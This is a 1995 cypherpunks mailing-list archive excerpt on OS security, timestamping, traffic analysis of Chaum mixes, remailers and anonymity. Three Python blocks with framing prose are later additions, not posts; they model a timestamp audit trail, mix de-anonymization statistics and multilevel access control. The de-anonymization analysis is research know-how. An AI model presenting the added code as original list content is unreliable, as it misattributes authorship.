talking about. Yes, if you get a priv'ed user to run a program it can
do anything. That's the case in all operating systems that I know of.

> Windows NT is supposedly secure.

And my mother is a bicycle.

NT is about as secure as VMS was, i.e. not at all. It's just got
different bugs.

> Certainly its design makes it possible to write software that is
> intrinsically secure, rather than creating a particular fix for each
> particular hole.

You mean, it makes proof of security possible for real programs? That
there is a proof of security available for the NT kernel? I'd settle
for a proof of non-crashing myself. Short of that I'm unaware of any
system that is "intrinsically" secure.

Now, I don't believe, in general, in flaming people for gross
ignorance, but it seems that Mr. Donald believes that there is some
sort of design flaw in Unix that makes it "inherently insecure". I
have no idea what this flaw might be. I know that Unix suffers from
the same problem all other operating systems from MVS to VMS to NT to
whatever else you can name suffer from -- bugs that make it possible
to break the system. If Mr. Donald can name an operating system that
has some sort of systematic way to make it secure that he knows of --
in other words, a formal proof of security of the system (i.e. an A1
secure system by the formal nomenclature), I'll happily hear about it
from him for the first time. Certainly my teachers never heard of such
a thing, and neither have I.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Tue, 24 Jan 95 18:44:20 PST
To: Jonathan Rochkind <jrochkin@cs.oberlin.edu>
Subject: Re: Shell's authentication needs
In-Reply-To: <ab4b3db603021004cb5d@[132.162.201.201]>
Message-ID: <Pine.3.89.9501241855.A1068-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 24 Jan 1995, Jonathan Rochkind wrote:
> It's not as elegant as time stamping, because you really need face-to-face
> contact. And you need to trust the stamper not to lie about his location (I
> can't remember how much you need to trust a time-stamper, but I think it's
> less).

You do not need to trust the time stamper at all, because from time
to time he publishes a one way checksum of everything he has
time stamped, or rather the audit trail for everything he
has time stamped.

So if the credibility of his stamp is questioned he just produces
the audit trail, and you know that the audit trail must have 
been created at the time claimed, because its checksum was
published at the time claimed.


 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com
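
The scheme discussed in this thread, a stamp carrying a time and a place whose audit trail is fixed by a periodically published one-way checksum, can be sketched as a hash chain. This is an added example, not code from any poster: the class and function names, the record layout and the use of SHA-256 as the one-way checksum are assumptions, and the documents and dates are constructed.

```python
import hashlib
import hmac
import json

GENESIS = "0" * 64  # chain value before the first stamp (assumed convention)


def doc_digest(document: bytes) -> str:
    return hashlib.sha256(document).hexdigest()


def chain(prev_head: str, record: dict) -> str:
    """One-way checksum of the audit trail up to and including record."""
    body = json.dumps(record, sort_keys=True, separators=(",", ":")).encode()
    return hashlib.sha256(bytes.fromhex(prev_head) + body).hexdigest()


class Stamper:
    """Hypothetical time/place stamper keeping an append-only audit trail."""

    def __init__(self):
        self.trail = []
        self.head = GENESIS

    def stamp(self, document: bytes, time: str, place: str) -> dict:
        record = {"seq": len(self.trail), "time": time, "place": place,
                  "doc": doc_digest(document)}
        self.head = chain(self.head, record)
        self.trail.append(record)
        return record

    def publish(self, date: str) -> dict:
        """The notice that would be printed somewhere public on `date`."""
        return {"date": date, "count": len(self.trail), "head": self.head}


def verify(trail: list, notice: dict, document: bytes):
    """Return the stamp record for document if the trail hashes to the
    published notice, else None. The publication date bounds when the
    record can have been created; the stamper's word is not needed."""
    head, found = GENESIS, None
    covered = trail[:notice["count"]]
    if len(covered) != notice["count"]:
        return None                      # trail shorter than what was published
    for index, record in enumerate(covered):
        if record.get("seq") != index:
            return None
        head = chain(head, record)
        if record.get("doc") == doc_digest(document):
            found = record
    return found if hmac.compare_digest(head, notice["head"]) else None


def demo():
    s = Stamper()
    contract = b"constructed sample: supply contract v1"
    s.stamp(b"constructed sample: unrelated memo", "1995-01-20T09:00Z", "Houston")
    s.stamp(contract, "1995-01-21T13:17Z", "Cleveland")
    notice = s.publish("1995-01-22")
    late = b"constructed sample: drafted after publication"
    s.stamp(late, "1995-01-21T13:18Z", "Cleveland")   # stamper backdates it

    results = {"honest": verify(s.trail, notice, contract)}
    # Backdated document: it only entered the trail after the notice appeared.
    results["backdated"] = verify(s.trail, notice, late)
    # Rewriting history: alter the time on a record the notice already covers.
    forged = [dict(r) for r in s.trail]
    forged[1]["time"] = "1994-12-01T00:00Z"
    results["rewritten"] = verify(forged, notice, contract)
    # The place field is only asserted: a stamper who lies about it at
    # stamping time still produces a trail that verifies.
    liar = Stamper()
    liar.stamp(contract, "1995-01-21T13:17Z", "Cleveland")  # really elsewhere
    results["false_place"] = verify(liar.trail, liar.publish("1995-01-22"), contract)
    return results


if __name__ == "__main__":
    for case, outcome in demo().items():
        print(case, "->", outcome)
```

The last case is the asymmetry raised in the thread: the published checksum removes the need to trust the stamper about time, while the place is still only as good as the stamper's word.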





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolb@barton.spring.com>
Date: Tue, 24 Jan 95 16:52:00 PST
To: cypherpunks@toad.com
Subject: Re: Clinton freezes U.S. assets of Mideast groups
In-Reply-To: <9501242335.AA14267@snark.imsi.com>
Message-ID: <Pine.3.89.9501241802.B6207-0100000@barton.spring.com>
MIME-Version: 1.0
Content-Type: text/plain


Now that the damage is done, (the assets frozen) I hope that all the
good black-marketers kept enough to keep them online, till the groups
can manage to sell some more oil. (Anyone ever price snake oil?)

Meanwhile, a national emergency, could ultimately force one that uses
PGP to have to either work for the Defense Dept. or a related company
that serves the Dept. directly. The Gulf War didn't cause any ripples,
but then PGP was in its infancy then. If they want to limit usage, it
sure looks like a good way to start.

Carol Anne

Registered<BETSI>BEllcore Trusted Software Integrity system programmer
***********************************************************************
Carol Anne Braddock   "Give me your Tired, your Poor, your old PC's..."
The TS NET                                  REVOKED PGP KEY NO.0C91594D     
carolb@spring.com                                       carolann@mm.com
************************************************************************
COMING SOON TO AN INTERNET NEWSGROUP NEAR YOU...............CENSORED.COM





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wei Dai" <weidai@eskimo.com>
Date: Tue, 24 Jan 95 19:05:11 PST
To: cypherpunks@toad.com
Subject: analysis of Chaum's MIX continued
Message-ID: <199501250304.AA05794@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3925.1071713475.multipart/mixed"

--Boundary..3925.1071713475.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

-----BEGIN PGP SIGNED MESSAGE-----

Last week I wrote about a way to trace who Alice, 
using a Chaumian mix, is writing to, by calculating a score 
for each user based on the number of times the receipt of a 
message by the mix from Alice is followed by a transmit to 
the user during the output phase of that batch (I need a 
name for these occurrences... any suggestions?).  Does 
this method actually work?  Well, let's see...

(Let me note that this method of traffic analysis can be 
applied to any Chaum type MIX, even if the MIX uses random 
delays instead of batches.  It can even be used on entire 
MIX-nets, by treating the MIX-net as a single large mix.  
However, I have to make several assumptions in the 
following analysis of how well this method works.  This 
doesn't mean that it won't work outside those assumptions, 
just that I don't know enough statistics to figure out how 
well it would work in a more general situation.  Maybe someone 
can give me a recommendation for a good statistics textbook?)

Let's assume:
1.  there is one mix which processes a batch every time it 
receives a certain number of messages
2.  there are N users
3.  all users send at most one message to the mix per 
batch, the probability that he will do so is S (I'm assuming 
every user sends the same number of messages per unit time 
on average, many of which can be dummies, and that the 
timing of these messages are random)
4.  all users receive at most one message from the mix per 
batch, with probability R (R<S or R>S depending on 
whether the mix eats more dummy messages than it 
generates)

Alice and Bob (the targets of the traffic analysis) are 
simply two of those users.

5.  In a particular batch, there is a probability Q (Q<=R and Q<=S) 
that Alice will send a message to Bob.  This implies that 
for each batch in which Alice doesn't send a message to 
Bob, there is a probability of (S-Q)/(1-Q) that she will 
send some other message to the mix (which may be a dummy 
message or a message to someone else).  Similarly, for each 
batch in which Bob doesn't receive a message from Alice, 
there is a probability of (R-Q)/(1-Q) that he will receive 
some other message from the mix.

Let T be the length of time (expressed in number of 
batches) since the start of the traffic monitoring
and let M(user) be the total number of times the receipt 
of a message by the mix from Alice is followed by a transmit 
to user during the output phase of that batch.

Note that the distribution of M is a binomial 
distribution B(T, R*S).  This means:
	mean of M = T*R*S
	standard deviation of M = sqrt(T*R*S*(1-R*S))

On the other hand,
	M(Bob) = T*Q + T(1-Q) * ((S-Q)/(1-Q)) * ((R-Q)/(1-Q))
		which simplifies to:
	M(Bob) = T * (Q + (S-Q)*(R-Q)/(1-Q))

Now, we can calculate a z-score for M(Bob) by subtracting 
from it the mean of M (this difference simplifies to 
T*Q*(1-S)*(1-R)/(1-Q) ) and dividing the difference by the 
standard deviation.  We can then find the standard normal 
probability p(z) associated with the z-score, and finally 
multiply 1-p(z) and the total number of users (N) to find how 
many users can be expected to have a larger M than Bob.  
Let's call this number A.

In conclusion:
                   T*Q*(1-S)*(1-R)/(1-Q)  
A = N * (1 - p ( ------------------------- ) )
                    sqrt(T*R*S*(1-R*S))   

It seems that as long as Q>0, S<1, and R<1, A converges to 
0 as T increases.  This means under the above assumptions, 
Bob will eventually be traced out if these 3 conditions are 
met.

Wei Dai

P.S.  If there aren't any serious mistakes in the above 
analysis, I may produce a table showing how long it would 
take for A to fall below 1 for various values of Q, R, 
S, and N.  Is there any interest in this?

For now, I've attached an Excel spreadsheet so you can try 
plugging numbers into the above formula.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLyW/fzl0sXKgdnV5AQHQ/gP+LF/P19djHH5UpXfNQWPsljRTFZv9Bi/S
nHJZKVOHC+T5b4/JLHIbNMbH5xRiM4wKHmmpdAoqNRBfWQm+nlikXnuwXJYZemM3
OxAEPLHflMby6SRvrtvT5r+ajm1GVqgYc2JE4Dyz5zBNqBlto1DG0KFK+1MNdYEQ
CDUAK5GndnU=
=qRUF
-----END PGP SIGNATURE-----

This message contains a file prepared for transmission using the
MIME BASE64 transfer encoding scheme. If you are using Pegasus
Mail or another MIME-compliant system, you should be able to extract
it from within your mailer. If you cannot, please ask your system
administrator for help.

   ---- File information -----------
     File:  mix-anal.xls
     Date:  24 Jan 1995, 18:51
     Size:  14848 bytes.
     Type:  Binary


--Boundary..3925.1071713475.multipart/mixed
Content-Type: application/octet-stream; name="bin00000.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00000.bin"
Content-Description: "mix-anal.xls"
--Boundary..3925.1071713475.multipart/mixed--
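
The formula for A in the message above can be evaluated directly to see how much cover traffic (higher S and R) delays the point at which Bob stands out, which is the table the P.S. offers. This is an added example, not the attached spreadsheet or the author's code: the function names, the sample parameter values and the Monte Carlo check of assumptions 1-5 are assumptions made here.

```python
import math
import random


def z_score(T, Q, R, S):
    """z-score of E[M(Bob)] against the B(T, R*S) count of an unrelated user."""
    if not (T > 0 and 0 <= Q <= min(R, S) and 0 < R < 1 and 0 < S < 1):
        raise ValueError("need T > 0, 0 <= Q <= min(R, S), 0 < R < 1, 0 < S < 1")
    excess = T * Q * (1 - S) * (1 - R) / (1 - Q)      # E[M(Bob)] - T*R*S
    return excess / math.sqrt(T * R * S * (1 - R * S))


def expected_rivals(N, T, Q, R, S):
    """A = N * (1 - p(z)): users expected to have a larger M than Bob."""
    return N * 0.5 * math.erfc(z_score(T, Q, R, S) / math.sqrt(2))


def batches_until_exposed(N, Q, R, S, threshold=1.0):
    """Smallest T with A < threshold; None when Q == 0 (A stays at N/2)."""
    if Q == 0:
        return None
    hi = 1
    while expected_rivals(N, hi, Q, R, S) >= threshold:
        hi *= 2                      # A decreases in T, so doubling brackets it
    lo = hi // 2
    while hi - lo > 1:               # invariant: A(hi) < threshold <= A(lo)
        mid = (lo + hi) // 2
        if expected_rivals(N, mid, Q, R, S) < threshold:
            hi = mid
        else:
            lo = mid
    return hi


def cover_traffic_table(N=1000, Q=0.02, rates=(0.1, 0.3, 0.6, 0.9)):
    """Batches until A < 1 when every user sends and receives at rate S = R."""
    return [(r, batches_until_exposed(N, Q, r, r)) for r in rates]


def simulate(T, Q, R, S, others, seed=1995):
    """Monte Carlo of assumptions 1-5: returns (M(Bob), [M(u) for other users])."""
    rng = random.Random(seed)
    p_send = (S - Q) / (1 - Q)       # Alice sends something other than to Bob
    p_recv = (R - Q) / (1 - Q)       # Bob receives something not from Alice
    m_bob, m_others = 0, [0] * others
    for _ in range(T):
        if rng.random() < Q:         # Alice writes to Bob in this batch
            alice_sent = bob_received = True
        else:
            alice_sent = rng.random() < p_send
            bob_received = rng.random() < p_recv
        if alice_sent:
            m_bob += bob_received
            for u in range(others):
                m_others[u] += rng.random() < R
    return m_bob, m_others


if __name__ == "__main__":
    for rate, batches in cover_traffic_table():
        print(f"S = R = {rate:.1f}: A < 1 after {batches} batches")
    m_bob, m_others = simulate(20000, 0.02, 0.3, 0.3, others=50)
    print("M(Bob) =", m_bob, " mean M(other) =", sum(m_others) / len(m_others))
```

Because z grows only with sqrt(T), the number of batches needed scales with the inverse square of Q(1-S)(1-R), so raising the sending and receiving rates toward 1 buys time but never stops A from converging to 0 while Q > 0.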



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Tue, 24 Jan 95 16:15:40 PST
To: Michael Froomkin <MFROOMKI@umiami.ir.miami.edu>
Subject: Re: Why emoney? Why not a web of debt?
In-Reply-To: <Pine.3.89.9501231119.A585123998-0100000@umiami.ir.miami.edu>
Message-ID: <9501250013.AA19202@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    Date: Mon, 23 Jan 1995 12:05:22 -0500 (EST)
    From: Michael Froomkin <MFROOMKI@umiami.ir.miami.edu>
    
    Sallie Mae's commercial paper is NOT backed by the full 
    faith and credit of the US government.  They carry a specific disclaimer 
    to that effect.  It is true that many personal student loans (GSLs) from 
    banks are guaranteed by the government.  The system was recently reformed 
    to remove the riskless subsidy to Sallie Mae, which is 100% privately 
    owned, and very profitable.
    
    Similarly Fannie Mae and all other privately held GSE's are only backed 
    by an "implicit" federal guarantee.  Although the only time one of these 
    got into trouble the feds did bail it out.

I inferred (perhaps erroneously) a tone of correction in your message.
For the record, GSLs and GNMA loans were the only loans which I
explicitly claimed were backed by the full faith and credit of the US
government.  Thank you for your clarification wrt Sallie Mae.

    On Mon, 23 Jan 1995, Rick Busdiecker wrote:
    [...]
    > Student Loans (at least GSLs) and GNMA loans are backed by ``the full
    > faith and credit'' of the US federal government.  As far as an
    > investor is concerned, loan default looks the same as if the loanee
    > paid their debt off early.  The `web of debt' suggestion posted here
    > doesn't seem to follow the same model unless you count virtually every
    > form of financial transaction -- including buying a cup of coffee with
    > a dollar bill -- as fitting the model.
    > 
    > As a side note, GNMA (Ginnie Mae) is not for `general loans', but
    > rather VA and FHA primary residence mortgages with various
    > restrictions.  GNMA, FNMA (Fannie Mae), and FHLMC (Freddie Mac) all
    > exist to provide secondary markets for various kinds of real estate
    > debt.
    [...]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jaeson.M.Engle@josaiah.sewanee.edu (Rhys Kyraden)
Date: Tue, 24 Jan 95 17:28:17 PST
To: cypherpunks@toad.com
Subject: SMTP and Received: from fields
Message-ID: <v01510111ab4b4b5b4759@[152.97.12.101]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

As an SMTP sender, is there any way to strip the Received: from <place...>
out of the message headers?
TIA,
- -K

-----BEGIN PGP SIGNATURE-----
Version: 2.6ui

iQCVAgUBLyWbIEiLvmPjc4XdAQF4qQQAoLZVhiQn3QJGigmDzvkYvBeQ8gTjw/7L
/IHAGprT+e4Qj2TEXRoQyi6gycyRsZYF9QhnuflG6sEtE4V8i/Z079RQpewTY7YT
ZiTi8WhSxYBRTu3FbgxpXNRULsQubivrxbkK31tqT8jHXOu7r5T+eTt1X7Lvr/4d
KtBralO3QHc=
=/C96
-----END PGP SIGNATURE-----

                                             aka:
(-: Jaeson M. Engle    ||    jme@josaiah.sewanee.edu :-)
(-:      www server: http://josaiah.sewanee.edu/         :-)
(-: It's February 3rd! IT'S TIME!!! Ask me for details!:-)
(-: Finger 'jme@josaiah.sewanee.edu' for my Public :-)
                                        PGP block.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com
Date: Tue, 24 Jan 95 19:39:13 PST
To: cypherpunks@toad.com
Subject: Re: Security of UNIX, NT, etc. (Was: Clinton Freezes...)
Message-ID: <9501250337.AB08493@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


James Donald writes:
> > At present it seems to me that unix machines on the internet
> > are intrinsically insecure -- the methods used to secure them
> > are a collection of ad hoc patches.  For example all
> > unix machines are vulnerable to the trojan
> > horse attack.

Depends on what trojan horse attack you have in mind.
Well-designed B1-secure systems can get rid of most of the 
Trojan Horse attacks by storing the trusted computing base
System Low and requiring root to only execute programs at that level, 
and running all users at higher classifications, like Unclassified.
Since users can't write down, they can't hack the TCB, 
so the main opportunity for Trojan Horses is to trick trusted programs
into interpreting data in dangerous ways (e.g. executable editor 
macros in email, or exploitation of a much smaller set of bugs
than usual.)

> > Windows NT is supposedly secure.
<ftp://sounds.sdsu.edu/somedir/evillaugh.au>

And Perry replies:

> NT is about as secure as VMS was, i.e. not at all. It's just got
> different bugs.

As is any system that was designed for purposes other than security
and had security added on.

(On VMS: The C2-rated VMS systems came out somewhat before the
Worms Against Nuclear Killers takeover of a NASA(?) network;
it seems that being rated C2 doesn't prevent you from shipping systems
with the factory-equipped SYSTEM and FIELD account passwords left alone.)

> > Certainly its design makes it possible to write software that is
> > intrinsically secure, rather than creating a particular fix for each
> > particular hole.
> 
> You mean, it makes proof of security possible for real programs? 
> That there is a proof of security available for the NT kernel?
> I'd settle for a proof of non-crashing myself.  Short of that I'm
> unaware of any system that is "intrinsically" secure.

I thought there were systems at at least the B3 level, if not A1;
Honeywell SCOMP comes to mind.  Of course, all those levels are
just Orange Book, and extending genuinely provable multilevel security
to the multi-computer networked problem was far beyond current research
when I was last current on the stuff.  (They could update me,
but then they'd have to kill me :-).)  There was also KSOS, but I don't
remember what level of security it reached.

There have been B2-rated networks which let single-level machines share 
a LAN (Verdix VSLAN), and there's a certain level of security you can get
running uucp on B1 systems, but bug-free shared networked general-purpose
systems are, uh, not very common.  And didn't Boeing have a high-rated
fiber LAN of some sort?

Actually, before networking, MS-DOS was perfectly secure.  After all,
there's only one User in the universe, and She is allowed to do
anything She wants, however ill-advised....


		Bill
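
The layout described in the message above (trusted computing base stored at System Low, root confined to executing programs at that level, users running at Unclassified or higher, no write down) can be modelled as a small access check. This is an added example, not from the original post: it is a simplified Bell-LaPadula-style model, and the SECRET level, the account names, the paths and the function names are assumptions.

```python
from dataclasses import dataclass

# Constructed linear ordering; only System Low and Unclassified are named in the post.
LEVELS = {"SYSTEM_LOW": 0, "UNCLASSIFIED": 1, "SECRET": 2}


@dataclass(frozen=True)
class Subject:
    name: str
    level: str
    is_root: bool = False


@dataclass(frozen=True)
class Obj:
    path: str
    level: str


def may_read(s, o):
    """No read up: a subject reads only at or below its own level."""
    return LEVELS[s.level] >= LEVELS[o.level]


def may_write(s, o):
    """No write down: a subject writes only at or above its own level."""
    return LEVELS[o.level] >= LEVELS[s.level]


def may_execute(s, o):
    """Executing needs read access; root is further confined to System Low."""
    if s.is_root and o.level != "SYSTEM_LOW":
        return False
    return may_read(s, o)


def exposures(subjects, objects):
    """Ways a non-root account could plant code in the TCB or in root's path."""
    found = []
    users = [s for s in subjects if not s.is_root]
    roots = [s for s in subjects if s.is_root]
    for o in objects:
        writers = [u.name for u in users if may_write(u, o)]
        if o.level == "SYSTEM_LOW" and writers:
            found.append(("user can modify TCB", o.path, writers))
        if writers and any(may_execute(r, o) for r in roots):
            found.append(("root runs user-writable code", o.path, writers))
    return found


ROOT = Subject("root", "SYSTEM_LOW", is_root=True)
ALICE = Subject("alice", "UNCLASSIFIED")
CAROL = Subject("carol", "SECRET")
OBJECTS = [Obj("/bin/login", "SYSTEM_LOW"),          # part of the TCB
           Obj("/home/alice/ls", "UNCLASSIFIED"),    # a planted look-alike
           Obj("/home/carol/notes", "SECRET")]


def policy_as_described():
    """Every user runs above System Low: nothing they write is run by root."""
    return exposures([ROOT, ALICE, CAROL], OBJECTS)


def misconfigured():
    """One ordinary account left at System Low reopens both paths."""
    operator = Subject("operator", "SYSTEM_LOW")
    return exposures([ROOT, ALICE, CAROL, operator], OBJECTS)


if __name__ == "__main__":
    print("as described:", policy_as_described())
    for finding in misconfigured():
        print("misconfigured:", finding)
```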




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Tue, 24 Jan 95 16:59:56 PST
To: Samuel Kaplin <skaplin@mirage.skypoint.com>
Subject: Re: Here's what will happen to U.S. based remailers
In-Reply-To: <Pine.SV4.3.91.950124161239.1512A-100000@mirage.skypoint.com>
Message-ID: <9501250054.AA19991@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    Date: Tue, 24 Jan 1995 16:15:20 -0600 (CST)
    From: Samuel Kaplin <skaplin@mirage.skypoint.com>
    
    On Tue, 24 Jan 1995, Lucky Green wrote:
    
    > Many years ago, I read a poem by a German priest
    
    Is this the poem, Lucky?
    
         They [Nazis] came first for the Communists,
    and I didn't speak up because I wasn't a Communist.
         Then they came for the Jews, 
    and I didn't speak up because I wasn't a Jew.
         Then they came for the Catholics, 
    and I didn't speak up because I was a Protestant.
         Then they came for me,
    and by that time there was no one left to speak up.
                             - Martin Niemller
    
Close.  You left out trade unionists and misspelled his last name, but
certainly got the bulk of it.  I'm typing from a pink triangular
button only because it's close by (pinned to my clinic escorting hat),
but I've previously verified that it matches the text from other
sources.  Of course, it may very well be a translation . . . .

I believe that Rishab Ghosh also sent an approximation of this text
out to the list a while back.

			Rick



	``In Germany they first came for the Communists, and I
	    didn't speak up because I wasn't a Communist.
	   Then they came for the Jews, and I didn't speak
	    up because I wasn't a Jew.  Then they came for
	      the trade unionists, and I didn't speak up
	       because I wasn't a trade unionist.  Then
		  they came for the Catholics, and I
		   didn't speak up because I was a
		   Protestant.  Then they came for
			me -- and by that time
			   no one was left
			    to speak up.''
				   
			      - Pastor
				Martin
			        Niemoller




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joe Turner <turner@telecheck.com>
Date: Tue, 24 Jan 95 18:02:56 PST
To: cypherpunks@toad.com
Subject: Windows email & pgp
Message-ID: <9501250203.AA00901@TeleCheck.com>
MIME-Version: 1.0
Content-Type: text



-----BEGIN PGP SIGNED MESSAGE-----

Yes, yet another WinSock E-mail program...

Lately, I have been trying out several mail programs for Windows, 
but have been sorely disappointed by their functionality. I was tired
of the annoying "please-send-me-money-now" windows popping up, programs 
that simply didn't work or worse, didn't work very well.
 
I have used many different mail programs on several platforms, and have 
yet to find one that I *really* like.  Elm would be the closest at this 
point, but it is annoying and time consuming to have to go through the 
pains of extracting a mail message, verifying signatures, etc.  As a
result, I have decided to write an SMTP mail program for Windows 3.x and
Windows NT (with WinSock) with PGP incorporated within it.

I felt that this is a great opportunity to spread the gospel about an 
undeniably practical use for encryption for the masses (sound familiar?),
somewhat in the vein that PGP was created by Zimmermann, and would like to 
solicit comments and/or suggestions for what to put in this program.  
Additionally, any guidance as to what steps I should take to obtain the
appropriate licenses, etc., to legally integrate PGP into a program of 
this type would be greatly appreciated.

Here are my specifications/criteria:
 
 - Perhaps most importantly, it should work.  It should: send, receive, 
   and forward mail messages; allow the user to delete and organize mail 
   messages into folder files; support signature files; support kill 
   files; pipe messages to a user-written application (like setting a 
   mail alias under UNIX).  Will support RFC821 and RFC822.  Forward 
   files must also be supported.

 - PGP will be included into the mail program itself, provided I can get 
   the appropriate permissions to legally do so.  The mail program will 
   automatically check for PGP keyblocks, encrypted messages, and 
   signatures.  Signatures will be automatically checked (unless 
   unfeasible) and the user alerted when a signature does not match.  
   The user will be prompted when keyblocks are in messages, to see if 
   the user would want to add them to his/her keyring.
 
 - List management.  Due to the high volume of the cypherpunks list, and 
   other lists, I have noticed that I have sometimes been neglected in 
   answering personal e-mail simply because it gets lost in the noise.  If 
   you are on a list, and configure it (i.e., signify the cypherpunks@toad.com 
   as a mail-list), every message from that list will be marked as such.  
   Mail from a List, but addressed to you from another user (the list is CC:d)
   will be marked accordingly too.  The idea here is to quickly highlight 
   messages that courtesy dictates you respond.  I was also thinking of a
   groupie/worship mode, but I think this is just too much.

 - Remailer.  This will take some more thought, but I would like to give
   the mail program the ability to forward messages and stomp on the 
   return address, etc., essentially creating a one way remailer.  Future 
   versions will support more, but this is a good start.

I believe that all of the above mentioned topics have been touched on 
before, but would like suggestions for this implementation.

This windows mail program will be released in the same spirit as PGP, 
free for academic and non-commercial use;  I will not beg for money 
(but thank-you's and admiration will be accepted as will helpful 
criticisms).  

I have already started hashing out the framework, but I will guesstimate that
it will be roughly 15 weeks before anything usable is produced.  Beta testers
anyone?


-----BEGIN PGP SIGNATURE-----
Version: 2.7

iQB1AwUBLyWv9M3mPt807UJ/AQEYOAL/eIhOy5IK0CmDKVl9Kp3lhTHEWmj2zpp1
kzEdD0Ktu4g2N4x+dvUyFEAkY5+mXh1IaexssoP5N7N7grO9NUnL7MST5DHCJQ12
P30DYvfCvPlAc4L41Wxp3pFS25mfI6Zz
=UJSx
-----END PGP SIGNATURE-----
-- 
Joe N. Turner		Telecheck International
turner@telecheck.com    5251 Westheimer, PO BOX 4659, Houston, TX 77210-4659
compu$erv: 73301,1654	(800) 888-4922  *   (713) 439-6597
Finger for me PGP KEY; PGP encrypted mail very welcome. 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vinod Valloppillil" <vvallopp@eniac.seas.upenn.edu>
Date: Tue, 24 Jan 95 18:11:41 PST
To: cypherpunks@toad.com
Subject: anonymous IRC access....
Message-ID: <199501250211.VAA11047@blue.seas.upenn.edu>
MIME-Version: 1.0
Content-Type: text/plain


Is there any way to get anon irc access?  there used to be a way to get
it a couple of years ago but I can't find any ways to do it now....

sounds like a problem for cypherpunks..
------------------------------+-----------------------------------------------
Vinod Valloppillil            | LibertarianismTelecommunicationsFreeMarketEnvi 
Engineering/Wharton           | ronmentalismTechnologyExtropianismElectronicCa
University of Pennsylvania    | shInteractiveTelevisionEconomicsPhilosophyDigi
vvallopp@eniac.seas.upenn.edu | talPrivacyAnarchoCapitalismRuggedIndividualism
------------------------------+-----------------------------------------------



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Tue, 24 Jan 95 18:24:41 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: A Legal Web Page Issue
Message-ID: <9501250215.AA18153@eri>
MIME-Version: 1.0
Content-Type: text/plain


At 01:43 AM 1/23/95, "L. McCarthy" <lmccarth@ducie.cs.umass.edu> wrote:
> ...
>The text of the actual copyright notice seems to have a much friendlier slant.
>It resembles a GNU or FSF-type freeware license. Apparently you're just not
>allowed to charge *more* than a flat fee:
>
>- From the bottom of the cited Web page:
>"Copyright 1994 by Pepper & Corazzini, L.L.P. All rights reserved. 
>Reproduction is permitted so long as no charge is made for copies, no copies
>are placed on any electronic online service or database for which there is a
>fee other than a flat access charge, there is no alteration and this 
>copyright notice is included."

Is a link a copy?  Probably not.  This would only seem to apply to someone 
copying the page itself onto another server.  Whether an HTTP access counts 
as a copy is a bit dubious.

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@hawksbill.sprintmrn.com (Paul Ferguson)
Date: Tue, 24 Jan 95 18:59:23 PST
To: dave@esi.COM.AU (Dave Horsfall)
Subject: Re: Clinton freezes U.S. assets of Mideast groups
In-Reply-To: <Pine.SUN.3.91.950125124718.10006L-100000@eram.esi.com.au>
Message-ID: <9501250258.AA02633@hawksbill.sprintmrn.com>
MIME-Version: 1.0
Content-Type: text



> 
> On Tue, 24 Jan 1995, James A. Donald wrote:
> 
> > For example all unix machines are vulnerable to the trojan horse attack.
> 
> Ah, which one would this be?
>


The same one that causes airplanes to crash.  :-)

This was obviously a doofus statement and should be treated as such.

- paul

 
_______________________________________________________________________________
Paul Ferguson                         
US Sprint                                          tel: 703.689.6828
Managed Network Engineering                   internet: paul@hawk.sprintmrn.com
Reston, Virginia  USA                             http://www.sprintmrn.com 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: doumakes@netcom.com (Don Doumakes)
Date: Tue, 24 Jan 95 21:04:43 PST
To: cypherpunks@toad.com
Subject: Re: LOCKSMITH'S GUILD WANTS L
Message-ID: <199501250503.VAA13311@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

tcmay@netcom.com (Timothy C. May) wrote:

> Again, I'm not claiming anything about PGP making conventional doctors
> obsolete. Just the increased freedom of a wide range of services to be
> negotiated electronically, without benefit of official guild approvals.
>
> (This is an actual concern the professional organizations have. They worry
> about online medical diagnoses, about "unlicensed" consultants, and about
> data bases over which they have no jurisdiction.)

I certainly agree with your implication, that professional groups can
and sometimes do use licensing to restrain trade, with an eye toward
feathering their own nests.

But I don't buy your other implication, that it is a Good Thing to
unleash the unlicensed.  Licensing serves, or should serve, a public
good under the following conditions:  (a) consumers don't have the
information necessary to make an informed choice between professionals,
and (b) it is pretty fucking important that the job be done right.
Doesn't make any sense to license those who program video games.  DOES
make sense to license those who design skyscrapers.

Now, there are ways to alleviate the consumer's lack of knowledge.  In
my former racket (professional nursing), there is a lot of talk about
benchmarking:  comparing patient outcomes at different hospitals and
